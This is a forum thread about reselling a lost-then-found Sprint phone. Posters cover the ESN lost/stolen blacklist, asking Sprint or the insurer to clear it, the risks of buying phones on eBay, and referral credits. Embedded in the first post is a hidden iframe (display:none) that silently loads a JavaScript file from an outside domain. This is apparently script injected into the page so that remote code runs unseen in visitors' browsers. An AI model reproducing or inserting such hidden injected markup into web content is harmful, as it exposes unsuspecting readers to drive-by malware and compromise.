+ Reply to Thread

Reselling question

I went on a charter boat trip a few months ago and I lost my phone. The boat captain looked but did not find it. The other members on the boat look and no one found it either. Well whatever, that's what insurance is for.

Anyway, filed a claim and got a new phone in about a week. Well 3 months later the boat captain called and they found my phone. So now I got two. Anyway I'm thinking about reselling my old phone.

If I re-sell the phone, could someone else activate it with his or her cel phone company?

Would it work for non-sprint customers?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

When Sprint replaced your lost phone they marked in there system that the old one was lost/stolen. So that if someone found it they would not be able to activate it. If they actually went to a Sprint store and tried to get it activated there, the Sprint rep would have to seize the phone.

Now, you could try to call Sprint and tell them that you found it and now want to pass it over to a friend. You can ask that it be removed from the master "ESN blacklist" for lost stolen numbers. Of course you would have to give them all your info like passwords, etc. to prove it is actually you. If you get a rep that wants to play hard ball, they could ask for the phone back but I really doubt that would happen. They usually never care and let you keep both.

Good luck.

(This is why I would NEVER buy a phone on EBAY...if it was stolen/lost and the seller found it and is selling it...Sprint will not under any circumstance activate it unless the previous owner, the one who lost it, clears it.)

This happened to me with my 300.....except I left it in a cab and later had it returned. I called Sprint and they had me call the insurance company. I told them I could send the phone back if they wanted. The guy at lockline told me I could do 1 of 3 things: 1. Send the phone back to them 2. Sell it on ebay 3. Give it to a friend. I opted for the last. He just told me to call sprint back and tell them that it was ok and to release the phone.......obviously there are still guards in place limiting ability to activate phones with other carriers.

It shouldn't be a problem so just give lockline a call...

I have purchased several cell phones on eBay with no problems. The key is to request the ESN from the seller, then call Sprint and verify that it can be activated before buying.:o
    Charles

ok...I have 2 Sanyo phones. One I found and one which I purchased.

I am selling the one that can't be activated.

You email me and ask for the ESN.

I give you the one I am currently using.

I mail you the bad one after purchase.

nah...I'll pass on finding phones on ebay.

I saw an i330 a while back going for $175 with a few minutes to go. I wouldn't even have time to email the seller and ask with that timeframe.

Don't get me wrong...I am sure there are a lot of people online selling good phones that can be activated. But there are also a lot more trying to sell the ones that can't. It's just too risky (for me at least) to take that chance.

I have had 2 friends that got burned this way. Ebay wouldn't do anything about it because the phones did in fact work..they just could not be activated.

Fair enough. I guess I have been very lucky to deal with honest people. I understand your concern. However, I think the one you are currently using would show as unable to activate as it is already activated.
    Charles

sprint pcs beta tester macmetal666's Avatar
    sprint has gotten good at the passing game.....double check that the former owner didnt have a past due balance also. sprint will require you to pay off any past due balance first.

if you do pass the phone off make sure you get the 40 dollar credit for doing so.
    my i500 is more obsolete than your ti-99 or apple IIe

$40.00 credit for passing sprint phone?

Hmmmm...

Can someone elaborate on this? I just disconnected my previous phone (LG5350) for the i300. I'm going to sell the LG5350 but where does the $40.00 credit come from and how?

sprint pcs beta tester macmetal666's Avatar
    sprint runs TWO very little known secerets to the world but nthe are "promotions"

first get a freind to buy that old beat to hell sch-3500 or that lousy piece of crap free kyocera that you couldnt PAY ME to use THEN AFTER they have service and a phone no start with this one
    $20 for u-10 for them credit dial #733 or #ref for the crdit...6 to 8 weeks after they offer you a credit for the referal of a new customer..

now for the biggie all you have to do is have the friend ask the rep for the info on the second time reuse customers on "giving a phone to a friend" they will tell you the no to call (i thinks is *4483) and this will get you a fourty dollar credit.
    my i500 is more obsolete than your ti-99 or apple IIe